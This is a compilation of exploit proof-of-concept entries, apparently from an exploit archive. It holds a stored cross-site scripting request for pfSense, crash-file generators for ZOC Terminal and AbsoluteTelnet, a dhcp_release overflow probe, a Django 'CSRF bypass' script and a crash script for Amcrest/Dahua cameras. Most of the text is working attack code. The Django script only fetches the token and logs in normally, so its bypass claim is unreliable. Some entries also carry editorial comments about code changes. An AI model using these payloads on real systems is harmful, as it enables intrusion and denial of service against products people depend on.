hyp3rlinx
  20. # Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.pfsense.org # Version: PfSense 2.4.4-P3 # Tested on: FreeBSD 11.2-RELEASE-p10 # CVE : CVE-2020-11457 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. # Vulnerable Parameter : descr # POC # Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. # This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is # the id of the user containing the payload. POST /system_usermanager.php?act=new HTTP/1.1 Host: TARGET Connection: close Content-Length: 410 Cache-Control: max-age=0 Origin: https://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Referer: https://TARGET/system_usermanager.php?act=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
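  # Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "ZOC_7.25.5_Script.zrx"
#     (the original step text said "exp.zrx", which did not match the file name the code writes)
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed

# 20000 'A' characters: an oversized "script" with no valid REXX content.
cod = "\x41" * 20000

# The context manager closes the handle even if the write raises; the original
# open()/write()/close() sequence leaked it on error.
with open('ZOC_7.25.5_Script.zrx', 'w') as f:
    f.write(cod)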
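  # Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
# Date: 2020-04-06
# Exploit Author: Josue Encinar
# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
# Version: 2.79
# Tested on: Ubuntu 18.04

import signal
from subprocess import PIPE, run

# Probe dhcp_release with an interface-name argument of growing length and
# report the first length at which the child process aborts.
#
# The command is passed as an argv list instead of a `shell=True` string: the
# string form only worked because the 'A' padding contains no shell
# metacharacters, and the original "Aborted (core dumped)" check depended on
# the *shell's* message rather than on the child's own exit status.
data = []
bof = False
for i in range(1, 200):
    A = "A" * i
    data = ["dhcp_release", A, "1", "1"]
    try:
        # run() waits for the child and closes both pipes; the original
        # Popen()/stderr.read() left every child unreaped.
        result = run(data, stdout=PIPE, stderr=PIPE)
    except FileNotFoundError:
        print("[-] dhcp_release not found in PATH")
        break
    except Exception as e:
        print(f"[-] {e}")
        continue
    error = result.stderr.decode(errors="replace")
    # glibc's FORTIFY check ends in abort(), so a fortified strcpy overflow
    # shows up as death by SIGABRT (negative return code). The stderr
    # substring is kept as a fallback for builds that print the message but
    # are not killed by the signal.
    if result.returncode == -signal.SIGABRT or "buffer overflow detected" in error:
        print("[+] Buffer Overflow detected!")
        print(f"[*] Offset: {i}")
        bof = True
        break

if not bof:
    print("[-] No buffer overflow...")

## Check line 273 in dhcp_release.c
### strcpy(ifr.ifr_name, argv[1]);
#
## PoC:
# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
# *** buffer overflow detected ***: dhcp_release terminated
# [+] Buffer Overflow detected!
# [*] Offset: 16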
  23. # Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass # Date: 2020-04-08 # Exploit Author: Spad Security Group # Vendor Homepage: https://www.djangoproject.com/ # Software Link: https://pypi.org/project/Django/ # Version: 3.0 =< # Tested on: windows 10 # Language: python3.8 # t.me/SpadSec # Spad Security Group from requests import Session import sys from bs4 import BeautifulSoup from time import sleep from colorama import Fore, Style from random import choice from os import name, system colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] def cleaner(): if name == "nt": system("cls") else: system("clear") def logo_printer(): cleaner() logo = r""" \_______/ `.,-'\_____/`-.,' /`..'\ _ /`.,'\ / /`.,' `.,'\ \ /__/__/ \__\__\__ \ \ \ / / / \ \,'`._,'`./ / \,'`./___\,'`./ ,'`-./_____\,-'`. / \ """ _logo_enumer = 0 for char in logo: sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") sys.stdout.flush() _logo_enumer +=1 sleep(0.005) print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") class DjangoCsrfMiddleWareBypass: def __init__(self, url: str, username: str, password: str): self.url = url self.username = username self.password = password logo_printer() self.cookies = {} self.session = Session() self.bypass() def spad_printer(self, string): print("\n") for char in string: sys.stdout.write(char) sys.stdout.flush() sleep(0.05) def bypass(self): global colors _conn = self.session.get(self.url) self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") for key, value in _conn.cookies.items(): self.cookies[key] = value self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!") soup = BeautifulSoup(_conn.text, "lxml") csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] 
self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) if len(login.history) >= 2: if login.history[1].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") else: self.spad_printer("[-] Error") else: if login.history: if login.history[0].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") for key, value in self.session.cookies.items(): self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") if __name__ == "__main__": try: url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] DjangoCsrfMiddleWareBypass(url, username, password) except IndexError: logo_printer() for char in f"[!] python {sys.argv[0]} http://google.com username password": sys.stdout.write(char) sys.stdout.flush() sleep(0.05)
  24. # Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) # Date: 2020-04-07 # Exploit Author: Jacob Baines # Vendor Homepage: https://amcrest.com/ # Software Link: https://amcrest.com/firmwaredownloads # Version: Many different versions due to number of Dahua/Amcrest/etc # devices affected # Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 # 4.000.00AC000.0 # CVE : CVE-2020-5735 # Advisory: https://www.tenable.com/security/research/tra-2020-20 # Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash import argparse import hashlib import socket import struct import sys import md5 import re ## DDNS test functionality. Stack overflow via memcpy def recv_response(sock): # minimum size is 32 bytes header = sock.recv(32) # check we received enough data if len(header) != 32: print 'Invalid response. Too short' return (False, '', '') # extract the payload length field length_field = header[4:8] payload_length = struct.unpack_from('I', length_field) payload_length = payload_length[0] # uhm... lets be restrictive of accepted lengths if payload_length < 0 or payload_length > 4096: print 'Invalid response. Bad payload length' return (False, header, '') if (payload_length == 0): return (True, header, '') payload = sock.recv(payload_length) if len(payload) != payload_length: print 'Invalid response. 
Bad received length' return (False, header, payload) return (True, header, payload) def sofia_hash(msg): h = "" m = hashlib.md5() m.update(msg) msg_md5 = m.digest() for i in range(8): n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e if n > 9: if n > 35: n += 61 else: n += 55 else: n += 0x30 h += chr(n) return h top_parser = argparse.ArgumentParser(description='lol') top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to") top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777") top_parser.add_argument('-u', '--username', action="store", dest="username", help="The user to login as", default="admin") top_parser.add_argument('--pass', action="store", dest="password", required=True, help="The password to use") args = top_parser.parse_args() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Attempting connection to " + args.ip + ":" + str(args.port) sock.connect((args.ip, args.port)) print "[+] Connected!" # send the old style login request. We'll use blank hashes. This should # trigger a challenge from new versions of the camera old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash "\x05\x02\x00\x01\x00\x00\xa1\xaa") sock.sendall(old_login) (success, header, challenge) = recv_response(sock) if success == False or not challenge: print 'Failed to receive the challenge' print challenge sys.exit(0) # extract the realm and random seed seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", challenge) if seeds == None: print 'Failed to extract realm and random seed.' 
print challenge sys.exit(0) realm = seeds.group(1) random = seeds.group(2) # compute the response realm_hash = md5.new(args.username + ":" + realm + ":" + args.password).hexdigest().upper() random_hash = md5.new(args.username + ":" + random + ":" + realm_hash).hexdigest().upper() sofia_result = sofia_hash(args.password) final_hash = md5.new(args.username + ":" + random + ":" + sofia_result).hexdigest().upper() challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + args.username + "&&" + random_hash + final_hash) sock.sendall(challenge_resp) (success, header, payload) = recv_response(sock) if success == False or not header: print 'Failed to receive the session id' sys.exit(0) session_id_bin = header[16:20] session_id_int = struct.unpack_from('I', session_id_bin) if session_id_int[0] == 0: print "Log in failed." sys.exit(0) session_id = session_id_int[0] print "[+] Session ID: " + str(session_id) # firmware version command = "Protocol: " + ("a" * 0x300) + "\r\n" command_length = struct.pack("I", len(command)) firmware = ("\x62\x00\x00\x00" + command_length + "\x04\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + command) sock.sendall(firmware) (success, header, firmware_string) = recv_response(sock) if success == False and not header: print "[!] Probably crashed the server." else: print "[+] Attack failed."
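  # Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

# 1000 'A' characters: an over-long username value.
buffer = "\x41" * 1000

# The context manager closes the handle even if the write raises; the original
# open()/write()/close() sequence leaked it on error.
with open("absolutetelnet_username_SSH1.txt", "w") as f:
    f.write(buffer)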